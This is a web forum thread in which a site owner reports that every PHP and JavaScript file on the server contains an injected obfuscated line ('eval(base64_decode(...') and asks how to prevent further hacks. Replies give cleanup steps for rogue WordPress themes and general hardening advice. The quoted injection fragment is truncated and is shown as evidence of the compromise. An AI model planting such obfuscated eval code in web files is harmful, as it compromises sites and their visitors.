i found a problem on my site and when i compare the files on the server with my local files i found that every page (*.js or *.php) has this line on it <?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKC
or a javascript line
so i knew that my site has been hacked..
so
1 - i want to know how to prevent anyone to hack my site?
i made on every textfield or textarea on posting or getting it the htmlspecialcharacter($_POST['name'])
If your site is wordpress and you downloaded a theme from a rogue site like worpressthemesbase.com (the first entry on the first Google SERP - still, even after I complained and turned these fiends in to Google...)
IF it is Wordpress, these rogue themes install a hyperlink in your footer and it's designed to be invisible if you are logged in.
It also makes changes to your wp-includes/general-template.php file.
If this is what happened to you, it's an easy fix.
1.) Upgrade to Wordpress 2.8.4
2.) Delete all rogue themes and don't try to fix them.
3.) Replace the file: wp-includes/general-template.php
That's it if this was your problem.
Post more information and/or your solution if you found one or if this was the solution.
What is the code in its entirety... post it in a code box. We can decode it....
While it might be interesting to do so, knowing what the inserted code is does not really help you prevent it from being inserted into your site again, other than, I suppose, using any info in it as something to search on to find out if there's a specific security hole.
As far as preventing:
Only use 3rd-party code that you trust, and make sure you use the latest versions.
Use strong passwords on your web host: login, FTP, and database. If you share them with anyone for some reason, change them as soon as that someone no longer needs them. Since you've been hacked, be sure to change all of them now.
Ensure all directories/files that do not have to have write permission for anyone other than the owner only allow writing by the owner. This is mainly important for shared hosts.
If this is an "important" site to you and you are on a shared host, consider moving to a dedicated host or at least a virtual dedicated host.
Get yourself a copy of Essential PHP Security by Shiflett and read it a couple times (it's short).
"Please give us a simple answer, so that we don't have to think, because if we think, we might find answers that don't fit the way we want the world to be."
~ Terry Pratchett in Nation
Reply With Quote
Originally Posted by donatello
Bookmarks